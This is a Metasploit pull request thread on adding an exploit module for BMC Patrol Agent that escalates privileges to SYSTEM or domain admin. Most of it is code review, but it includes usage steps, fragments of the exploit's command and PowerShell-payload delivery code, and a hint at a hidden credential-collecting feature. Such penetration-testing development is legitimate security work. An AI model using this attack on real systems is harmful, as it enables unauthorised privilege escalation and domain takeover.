Bmc Patrol Agent Command Exec Module
rapid7/metasploit-framework pull request #11382
Opened 2019-02-11 04:27 UTC by rwincey

Added a module for executing commands/payloads through the BMC Patrol Agent service. The reason this is interesting is because BMC Patrol Agent allows for privilege escalation on Windows systems by default, user -> SYSTEM. This gets even more interesting if Patrol Agent is installed on a domain controller as then you get user -> domain admin. More information can be found here. https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/misc/bmc_patrol_cmd_exec`
- [ ] `set USER user`
- [ ] `set PASSWORD password`
- [ ] `set CMD whoami`
- [ ] `exploit`
- [ ] `Output: nt authority\system`

2019-02-11 16:00 UTC, wchen-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +  def finish
What you want here is actually a `def cleanup` function instead of `def finish`. `def cleanup` automatically gets called when the module finishes (or quits unexpectedly). Try to do something like this:

```ruby
def cleanup
  # Code goes here
  super
end
```

Also, you want to avoid using global variables. The reason is because they are not manageable, and you could be changing the state of some framework code by accident. To keep your variables within the scope of a module, try using instance variables. For example:

```ruby
@inflater.close
@deflater.close
```

2019-02-11 16:06 UTC, wchen-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    encrpted_pw = output_data.unpack("H*")[0]
Your `des_crypt_func` could return nil, so you actually need to check for that return value before using it. Otherwise, this is technically a bug.

2019-02-11 16:11 UTC, wchen-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    if datastore['CMD'] == ""
By default `datastore['CMD']` is actually nil... so maybe you don't need this anymore.

2019-02-11 16:15 UTC, wchen-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    target_os = get_target_os(srv_info)
Your `process_response` function could return nil. You should still check that before passing the value to a different function.

2019-02-11 16:16 UTC, wchen-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    init_des();
semicolon isn't needed.

2019-02-11 16:17 UTC, wchen-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +  $sboxes = [ 0x20022000,0x20000000,0x0,0x20022000,0x0,0x20022000,0x20000000,0x0,0x20022000,
Instead of global variables, you should probably try using constants in this case.

2019-02-12 02:06 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    encrpted_pw = output_data.unpack("H*")[0]
Since the function is only being used for encryption and the nil case is from DECRYPT, I removed the code to make it clearer.

2019-02-12 02:07 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    if datastore['CMD'] == ""
This behavior was intended. It is to handle the case that are user switches between payload based usage and sending single commands. Otherwise the code will not work as expected further down.

2019-02-12 02:14 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    init_des();
Resolved

2019-02-12 02:15 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    target_os = get_target_os(srv_info)
Removed nil case as it should either be compressed or uncompressed. While it should always be compressed, added code to handle unexpected case.

2019-02-12 02:15 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +  def finish
Resolved.

2019-02-12 02:16 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +  $sboxes = [ 0x20022000,0x20000000,0x0,0x20022000,0x0,0x20022000,0x20000000,0x0,0x20022000,
Resolved

2019-02-12 18:14 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
Instead of using `return` in an `if` block to exit the function, you could try something like:

```
def get_target_os( srv_info_msg )
  lines = srv_info_msg.split("\n")
  fail_with(FAILURE::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" && lines[1] != "{" && lines[-1] != "}"
  ...
```

2019-02-12 18:14 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    return [os,ver]
`return` is not required.

2019-02-12 18:18 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
You could do something similar to the suggest for `get_target_os` above.

2019-02-12 18:18 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    return output
`return` is not required.

2019-02-12 18:22 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
Here's another place you could use `fail_with()` instead of `return`.

2019-02-12 18:22 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    ret_data = receive_msg()
The parentheses can be removed.

2019-02-12 18:24 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
The else block could use `fail_with()` instead of `return`.

2019-02-12 18:25 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
You can opt for `fail_with()` here as well.

2019-02-12 18:25 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    ret_data = receive_msg()
The parentheses are not needed.

2019-02-12 18:26 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
`fail_with()` can also be used here.

2019-02-12 18:27 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
`fail_with()` can be used here also.

2019-02-12 18:28 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    ret_data = receive_msg()
The parentheses are not needed.

2019-02-12 18:28 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    ret_data = receive_msg()
The parentheses are not needed.

2019-02-12 18:30 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +  def receive_msg()
The parentheses are not required for functions without parameters.

2019-02-12 18:44 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +  end
`fail_with()` can be used for the `header` and `payload` checks in a way similar to this:

```
def receive_msg
  header = sock.get_once(6)
  fail_with(Failure::UnexpectedReply, "Could not retrieve header") unless header
	
  payload_size_arr = header[0,4]
  payload_size = payload_size_arr.unpack("N")[0]
  payload = sock.get_once(payload_size)
    
  unless payload && payload_size > 0
    fail_with(Failure::BadConfig, "Failed to create payload")
  end
    
  header + payload
end
```

2019-02-12 18:45 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    ret_len = 0
This can be removed since it looks like it is not being used.

2019-02-12 18:45 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    return payload_data
`return` is not required.

2019-02-12 18:58 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    right ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)]
This is untested, but I think this block can be reduced by using the `each` method:

```
def desx( data_block, ksch, idx)
  ...
  right = 0
  left = 0
  counter = 1
	
  data_block_byte_ptr = [data_block_ptr].pack('Q<')
  left = SBOXES[data_block_byte_ptr[0].ord]
  right = SBOXES[data_block_byte_ptr[0].ord + (counter << 6)]
    
  (1...7).each do |index|
    counter += 1
    left ^= SBOXES[data_block_byte_ptr[index].ord + (counter << 6)]
    counter += 1
    right ^= SBOXES[data_block_byte_ptr[index].ord + (counter << 6)]
  end
  ...
end
```

2019-02-12 18:59 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    init_des()
The parentheses can be removed.

2019-02-13 04:44 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +  end
Won't be changing this because this would fail on the cases were a payload is delivered as the cmd results are not sent back.

2019-02-13 04:44 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    right ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)]
Tested and does not work

2019-02-13 04:45 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    init_des()
Done

2019-02-13 04:45 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    return payload_data
Done

2019-02-13 04:46 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    ret_len = 0
Done

2019-02-13 04:48 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    return output
Done

2019-02-13 04:48 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    return [os,ver]
Done

2019-02-13 05:08 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    ret_data = receive_msg()
Done

2019-02-13 05:09 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    ret_data = receive_msg()
Done

2019-02-13 05:10 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    ret_data = receive_msg()
Done

2019-02-13 05:10 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    ret_data = receive_msg()
Done

2019-02-13 05:10 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +  def receive_msg()
Done

2019-02-13 05:23 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
Done

2019-02-13 05:26 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
Done

2019-02-13 05:28 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
Done

2019-02-13 05:31 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
Done

2019-02-13 05:31 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
Done

2019-02-13 05:31 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
Done

2019-02-13 05:32 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    end
Removed

2019-02-13 05:43 UTC, bcoles commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    right ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)]
Are you sure? This functionality looks like it would work in a loop. For simplicity, the zeroeth iteration should probably be performed before the loop.

2019-02-13 08:18 UTC, bcoles commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +        powershell to execute the payload. The powershell version tends to timeout on
```
0.21s$ ./.git/hooks/post-merge
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb:147 - [WARNING] Spaces at EOL
```

```suggestion
        powershell to execute the payload. The powershell version tends to timeout on
```

2019-02-13 15:27 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +        powershell to execute the payload. The powershell version tends to timeout on
Not sure how this snuck in.

2019-02-13 15:28 UTC, rwincey commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    right ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)]
Yes, I'm sure, and I'd rather not keep mucking with it if there's no benefit other than saving a few lines.

2019-02-14 21:26 UTC, FireFart commented
tested this module on some live systems and it works pretty well 👍

2019-02-14 21:58 UTC, securifera commented
Those with attention to detail might notice a another freebie stashed away in the code that could be useful for collecting credentials on the network.

2019-02-25 15:30 UTC, rwincey commented
Is there something holding up this merge?

2019-02-27 21:02 UTC, space-r7 commented
Apologies for being so late at getting back to this. Thank you for addressing the previous changes!

There are still a couple of things that could potentially be improved before merging. First, it might be better to remove the option to run a single command since modifying datastore options on the fly could possibly result in unexpected behavior, and the chosen command can be run from the resulting shell if the user opts for running just a single command. I'm not particularly hard-set on this, as I see your reasoning on why this is a necessary option, but it's something to consider.

Second, are the custom encryption methods required for this exploit to work? If not, please consider using the DES algorithms provided by `OpenSSL`, as those are already available to use and could clean up the code a bit. More info on the usage can be found [here](https://ruby.github.io/openssl/OpenSSL/Cipher.html).

If you still have access to the BMC software, please send a pcap that demonstrates this module's functionality to msfdev[at]metasploit.com. Thank you!

2019-02-28 04:03 UTC, rwincey commented
> There are still a couple of things that could potentially be improved before merging. First, it might be 
> better to remove the option to run a single command since modifying datastore options on the fly
> could possibly result in unexpected behavior, and the chosen command can be run from the resulting > shell if the user opts for running just a single command. I'm not particularly hard-set on this, as I see 
> your reasoning on why this is a necessary option, but it's something to consider.

I chose this approach because honestly I didn't want to push two separate modules, one for cmd execution and one for payload callbacks.  Unfortunately it got a bit hacky because the Msf::Exploit::Remote class always opens a handler even if it's not needed. If there is a better approach please feel free.

> Second, are the custom encryption methods required for this exploit to work? If not, please consider
> using the DES algorithms provided by `OpenSSL`, as those are already available to use and could clean
> up the code a bit. More info on the usage can be found [here]

I'll preface this with I am by no means an expert in crypto implementations but all versions of OpenSSL DES I tried did not perform the same encryption as the one implemented in the module, included the ruby OpenSSL implementation. I also reviewed several open source implementations and they did not match the module implementation which I ported from C. From what I could tell it appears the S Boxes are different.

> If you still have access to the BMC software, please send a pcap that demonstrates this module's 
> functionality to msfdev[at]metasploit.com. Thank you!

You have mail.

2019-02-28 15:18 UTC, space-r7 commented
> I chose this approach because honestly I didn't want to push two separate modules, one for cmd execution and one for payload callbacks. Unfortunately it got a bit hacky because the Msf::Exploit::Remote class always opens a handler even if it's not needed. If there is a better approach please feel free.
> 

There is the possibility of creating an additional target (or replacing `Target 1`) with its default option set to `DisablePayloadHandler => true`. That might work as a better approach since you wouldn't have to manually configure the handler in the module.

> I'll preface this with I am by no means an expert in crypto implementations but all versions of OpenSSL DES I tried did not perform the same encryption as the one implemented in the module, included the ruby OpenSSL implementation. I also reviewed several open source implementations and they did not match the module implementation which I ported from C. From what I could tell it appears the S Boxes are different.
>

Okay, in that case, I'll give the code another look and suggest changes if needed.

> You have mail.

Got it! Thanks!

2019-02-28 15:47 UTC, rwincey commented
> > I chose this approach because honestly I didn't want to push two separate modules, one for cmd execution and one for payload callbacks. Unfortunately it got a bit hacky because the Msf::Exploit::Remote class always opens a handler even if it's not needed. If there is a better approach please feel free.
> 
> There is the possibility of creating an additional target (or replacing `Target 1`) with its default option set to `DisablePayloadHandler => true`. That might work as a better approach since you wouldn't have to manually configure the handler in the module.
> 

I currently set DisablePayloadHandler to true on line 178, then I only manually start up a handler for the cases where a CMD has not been set, aka PAYLOAD based targets. I attempted creating a new TARGET and moved the DisablePayloadHandler option inside the target definition.

[
	'Generic Command Execution', {
	  'Arch' => ARCH_CMD,
	  'Platform' => %w[linux unix win],
	  'DisablePayloadHandler' => true
	}
],

However it still created the handler. Am I misunderstanding your recommendation?

2019-02-28 18:18 UTC, space-r7 commented
> 
> I currently set DisablePayloadHandler to true on line 178, then I only manually start up a handler for the cases where a CMD has not been set, aka PAYLOAD based targets. I attempted creating a new TARGET and moved the DisablePayloadHandler option inside the target definition.
> 
> [
> 'Generic Command Execution', {
> 'Arch' => ARCH_CMD,
> 'Platform' => %w[linux unix win],
> 'DisablePayloadHandler' => true
> }
> ],
> 
> However it still created the handler. Am I misunderstanding your recommendation?

I think it needs to be wrapped in a `DefaultOptions` hash like so: 
```
[
  'Generic Command Execution', {
    'Arch' => ARCH_CMD,
    'Platform' => %w[linux unix win],
    'DefaultOptions' => { 'DisablePayloadHandler' =>  true }
  }
]
```

2019-02-28 18:19 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +  @des_keysch_1 = $nil
These two variables can be removed from this location.

2019-02-28 18:19 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    if ret_data != $nil and datastore['CMD'] != $nil
Use `&&` instead of `and`.

2019-02-28 18:20 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    ksch = ksch_arg;
Is this assignment needed?

2019-02-28 18:20 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +        ti_block_1 = desx( ti_block_1, ksch, 15 - i )
Could both references to `ksch` be replaced with `ksch_arg`?

2019-02-28 18:20 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +  end
This function can be removed since it's only used once in `des_string_to_key`.

2019-02-28 18:20 UTC, space-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    init_des
This line can be replaced with the first two lines that are currently in the function, and I don't think `des_keysch_0` and `des_keysch_1` need to be instance variables since their usage is only in this function.

2019-03-01 02:54 UTC, rwincey commented
> > I currently set DisablePayloadHandler to true on line 178, then I only manually start up a handler for the cases where a CMD has not been set, aka PAYLOAD based targets. I attempted creating a new TARGET and moved the DisablePayloadHandler option inside the target definition.
> > [
> > 'Generic Command Execution', {
> > 'Arch' => ARCH_CMD,
> > 'Platform' => %w[linux unix win],
> > 'DisablePayloadHandler' => true
> > }
> > ],
> > However it still created the handler. Am I misunderstanding your recommendation?
> 
> I think it needs to be wrapped in a `DefaultOptions` hash like so:
> 
> ```
> [
>   'Generic Command Execution', {
>     'Arch' => ARCH_CMD,
>     'Platform' => %w[linux unix win],
>     'DefaultOptions' => { 'DisablePayloadHandler' =>  true }
>   }
> ]
> ```

Tested wrapped in DefaultOptions and it still creates a handler. 

As the current solution has been styled, optimized, and functionally tested (thanks @FireFart) can we just merge on in? We're not tryin to put people on the moon 🚀

2019-03-01 19:13 UTC, jmartin-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    if datastore['CMD'] == $nil or datastore['CMD'].empty?
The code is here is not really useful, and does works simply by change.

Please review ruby code syntax and standards here:

2019-03-02 05:27 UTC, jmartin-tech requested changes
While it is accurate that we do not need perfect code, the current state here does not meet an acceptable bar.

Making effective use of the `Targets` metadata to disable the handler using existing features, as well as ensuring the code uses syntax correctly for the Ruby language are important standards for modules especially since many contributors copy what they see in accepted modules.

The `desx` implementation embedded here also makes this module complex to read and adds many methods that should be private and internally used in the algorithm to the public method list for the module.

I would be happy to make most of my request change and offer them as a PR to your branch, however testing would be needed. Access to the software is limited at this time.

Also if the `DisablePayloadHander` option is still not working as desired I am happy help find a compromise that gets this across the line.

2019-03-02 05:27 UTC, jmartin-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    target_name = target.name
Variable declared here is not needed.

2019-03-02 05:27 UTC, jmartin-r7 commented on modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> +    elsif target_name == 'Windows Powershell Injected Shellcode'
Since the variable is only tested once just pull from the original `target` object.
``` suggestion 
    elsif target.name == 'Windows Powershell Injected Shellcode'
```

2019-03-02 08:48 UTC, zealedmk commented
https://www.elbashmodrs.com/2018/12/180.html

On Sat, Mar 2, 2019 at 7:29 AM Jeffrey Martin <notifications@github.com>
wrote:

> *@jmartin-r7* requested changes on this pull request.
>
> While it is accurate that we do not need perfect code, the current state
> here does not meet an acceptable bar.
>
> Making effective use of the Targets metadata to disable the handler using
> existing features, as well as ensuring the code uses syntax correctly for
> the Ruby language are important standards for modules especially since many
> contributors copy what they see in accepted modules.
>
> The desx implementation embedded here also makes this module complex to
> read and adds many methods that should be private and internally used in
> the algorithm to the public method list for the module.
>
> I would be happy to make most of my request change and offer them as a PR
> to your branch, however testing would be needed. Access to the software is
> limited at this time.
>
> Also if the DisablePayloadHander option is still not working as desired I
> am happy help find a compromise that gets this across the line.
> ------------------------------
>
> In modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> <https://github.com/rapid7/metasploit-framework/pull/11382#discussion_r261724721>
> :
>
> > +
>
> +    lines = cmd_output_msg.split("\n")
>
> +    fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}"
>
> +
>
> +    #Parse out command results
>
> +    idx_start = cmd_output_msg.index("Result\x00")
>
> +    idx_end = cmd_output_msg.index("RemPsl_user")
>
> +    output = cmd_output_msg[idx_start+7..idx_end-1]
>
> +
>
> +    output
>
> +  end
>
> +
>
> +  def exploit
>
> +
>
> +    #Manually start the handler if not running a single command
>
> +    if datastore['CMD'] == $nil or datastore['CMD'].empty?
>
>
> The code is here is not really useful, and works simply by chance.
>
> Please review ruby code syntax and standards here:
> $nil would be a global variable name that just happens to currently not
> be defined.
>
> A correct syntax would be:
>
> if datastore['CMD'].nil? or datastore['CMD'].empty?
>
>
> Based on what it looks like the desired behavior is, I would suggest
> changing this block to
>
>      unless datastore['CMD'].nil?
>
>        print_status("Disabling payload handler for single command execution.")
>
>        datastore['DisablePayloadHandler'] = true
>
>      end
>
>
> ------------------------------
>
> In modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> <https://github.com/rapid7/metasploit-framework/pull/11382#discussion_r261809944>
> :
>
> > +    #receive the server info
>
> +    ret_data = receive_msg
>
> +    fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data == $nil
>
> +    srv_info = process_response(ret_data)
>
> +
>
> +    #Get the target's OS from their info msg
>
> +    target_os = get_target_os(srv_info)
>
> +
>
> +    # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
>
> +    # Fail if this is the case and ask the user to select an appropriate payload.
>
> +    if target_os[0] == 'Linux' and payload_instance.name =~ /Windows/ and datastore['CMD'] == $nil
>
> +      fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
>
> +    end
>
> +
>
> +    target_name = target.name
>
> +    if datastore['CMD'] != $nil
>
>
> ⬇️ Suggested change
>
> -    if datastore['CMD'] != $nil
>
> +    unless datastore['CMD'].nil?
>
>
> ------------------------------
>
> In modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> <https://github.com/rapid7/metasploit-framework/pull/11382#discussion_r261810105>
> :
>
> > +    if datastore['CMD'] != $nil
>
> +      command = datastore['CMD'].tr('"', '\"')
>
> +      print_status("Command to execute: #{command}")
>
> +    elsif target_name == 'Windows Powershell Injected Shellcode'
>
> +      #Get encoded powershell of payload
>
> +      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
>
> +    else
>
> +      command = payload.raw.tr('"', '\"')
>
> +    end
>
> +
>
> +    #Run command
>
> +    run_cmd(command)
>
> +
>
> +    #receive command confirmation
>
> +    ret_data = receive_msg
>
> +    if ret_data != $nil
>
>
> ⬇️ Suggested change
>
> -    if ret_data != $nil
>
> +    unless ret_data.nil?
>
>
> ------------------------------
>
> In modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> <https://github.com/rapid7/metasploit-framework/pull/11382#discussion_r261810115>
> :
>
> > +    else
>
> +      command = payload.raw.tr('"', '\"')
>
> +    end
>
> +
>
> +    #Run command
>
> +    run_cmd(command)
>
> +
>
> +    #receive command confirmation
>
> +    ret_data = receive_msg
>
> +    if ret_data != $nil
>
> +      process_response(ret_data)
>
> +    end
>
> +
>
> +    #receive command output
>
> +    ret_data = receive_msg
>
> +    if ret_data != $nil && datastore['CMD'] != $nil
>
>
> ⬇️ Suggested change
>
> -    if ret_data != $nil && datastore['CMD'] != $nil
>
> +    if !ret_data.nil? && !datastore['CMD'].nil?
>
>
> At this point in the process is there any need to check datastore['CMD']?
> I would expect that ret_data would be nil or empty if no command was
> offered. There might be some value in processing any returned data here
> regardless.
> ⬇️ Suggested change
>
> -    if ret_data != $nil && datastore['CMD'] != $nil
>
> +    unless ret_data.nil?
>
>
> ------------------------------
>
> In modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> <https://github.com/rapid7/metasploit-framework/pull/11382#discussion_r261810511>
> :
>
> > +    #receive command confirmation
>
> +    ret_data = receive_msg
>
> +    if ret_data != $nil
>
> +      process_response(ret_data)
>
> +    end
>
> +
>
> +    #receive command output
>
> +    ret_data = receive_msg
>
> +    if ret_data != $nil && datastore['CMD'] != $nil
>
> +      cmd_result_data = process_response( ret_data )
>
> +      cmd_result = get_cmd_output(cmd_result_data)
>
> +      print_status( "Output:\n#{cmd_result}" )
>
> +    end
>
> +
>
> +    #Handle the shell
>
> +    handler
>
>
> No need to call this if the block above no longer attempts to manually
> manipulate the handler.
> ------------------------------
>
> In modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> <https://github.com/rapid7/metasploit-framework/pull/11382#discussion_r261810754>
> :
>
> > +
>
> +      if decrypt_flag == 1
>
> +        output_block ^= iv
>
> +        result = cur_block
>
> +        iv = cur_block
>
> +      else
>
> +        result = output_block
>
> +        iv = output_block
>
> +      end
>
> +    end
>
> +
>
> +    output_block_arr.pack("Q<*")
>
> +
>
> +  end
>
> +
>
> +  def des_crypt_func( binary_buf, key_buf, decrypt_flag )
>
>
> This implementation looks like it should be extracted into a separate
> class as a utility or library.
>
> This desx implementation looks like it was cribbed from some other
> location. You mentioned in comments translating it from a C library
> somewhere. We prefer to see author attribution or at least linking to
> original sources for things like this since we need to ensure licenses are
> compatible with BSD-3 that metasploit-framework uses.
> ------------------------------
>
> In modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
> <https://github.com/rapid7/metasploit-framework/pull/11382#discussion_r261811311>
> :
>
> > +        ],
>
> +      'Platform'       => ['win','linux'],
>
> +      'Targets'         =>
>
> +        [
>
> +          [
>
> +            'Windows Powershell Injected Shellcode', {
>
> +              'Platform' => 'win'
>
> +            }
>
> +          ],
>
> +          [
>
> +            'Generic Command Callback', {
>
> +              'Arch' => ARCH_CMD,
>
> +              'Platform' => %w[linux unix win]
>
> +            }
>
>  [...]

2019-03-06 03:34 UTC, rwincey reviewed
💀

2019-03-08 17:04 UTC, busterb commented
Working on style updates to the module now. A lot of it has been just mechanical changes for making Ruby happier. I'm down about 1200 warnings, so it's going well!

Will sing out when the cleaned-up module is ready for some live testing. Thanks all for persevering :muscle: 

https://github.com/busterb/metasploit-framework/tree/land-11382

2019-03-08 21:29 UTC, rwincey commented
For those of us in the community that don't regularly code in Ruby, contribute often, or work for Rapid7, I feel like a lot of time could be saved by politely asking if Rubocop was installed and executed against the module prior to submitting a pull request rather than have 5 maintainers pick their favorite five warnings from a Rubocop run and pointing it out. I'll openly admit I missed this in the contributing documentation, as I am sure you find many of your contributors do, but it might require a little more emphasis if you expect code submissions to meet those standards or possibly consolidate it with msftidy.

2019-03-08 21:41 UTC, busterb commented
Understood and agree @rwincey. Will see what we can do to make getting over the initial hurdle more self-serve, since it saves us all a lot of time and noise in the process.

By the way, I finished the initial cleanup pass in the branch above, and disabled some of the more annoying behavior of rubocop (not everything it warns against is really bad in Metasploit's context). Even now I'm questioning whether I'd just revert some of the changes and disable the rules instead but there's always that one time it finds a real bug...

Would you be able to give it a quick test at any rate?

2019-03-09 00:34 UTC, rwincey commented
Tested your branch and commit 1b4de64001b8415e7bd862f5d3eb14fe4d5765c3 currently breaks the encryption algo and thus the authentication mechanism.

2019-03-09 04:36 UTC, busterb commented
Thanks @rwincey,  As you noted, it would probably be more efficient to address the remaining style issues yourself, since I'm obviously fumbling a bit in the dark, and since you know where to look now.

I did make another pass at removing more cosmetic checks from rubocop.yaml, especially anything that asks for changes to algorithmic structure along the way like, undid the related changes in the cleanup branch, and pushed up the results above again. I'm doing this a bit to help tune our automation for next time, so apologies for using this one as a test case. Does it work any better now?

PS: Did you ever have a chance to work with the 'BMC Truesight Pulse' agent. I helped develop an earlier version of that agent before it was part of BMC, and wonder if the 'version' easter egg is still in the code. Just curious...

2019-03-09 19:21 UTC, rwincey commented
> Thanks @rwincey, As you noted, it would probably be more efficient to address the remaining style issues yourself, since I'm obviously fumbling a bit in the dark, and since you know where to look now.

No worries, thanks for knocking out a good chunk of them. Rubocop changes have been committed.

> I did make another pass at removing more cosmetic checks from rubocop.yaml, especially anything that asks for changes to algorithmic structure along the way like, undid the related changes in the cleanup branch, and pushed up the results above again. I'm doing this a bit to help tune our automation for next time, so apologies for using this one as a test case. Does it work any better now?

It seems to be less noisy now. Unfortunately I can't really speak to a difference though as I hadn't used the tool at all until discovering that's what you were using to produce all of the warnings referenced in your comment.

> PS: Did you ever have a chance to work with the 'BMC Truesight Pulse' agent. I helped develop an earlier version of that agent before it was part of BMC, and wonder if the 'version' easter egg is still in the code. Just curious...

I have not encountered the BMC Truesight Pulse agent. The PATROL agent appears to return a version alongside the OS as you can see on line 218 but I don't know how accurate it is as I have seen inconsistencies.

2019-03-15 18:23 UTC, merged

2019-03-15 18:24 UTC, busterb commented
Thanks for the updates @rwincey. I gave it another look and it worked for me.

2019-03-15 18:26 UTC, busterb commented
## Release Notes

This adds a local exploit module for executing commands/payloads through the BMC Patrol Agent service. The BMC Patrol Agent allows for privilege escalation on Windows systems by default, as well as allows executing commands as a domain administrator when run on a domain controller.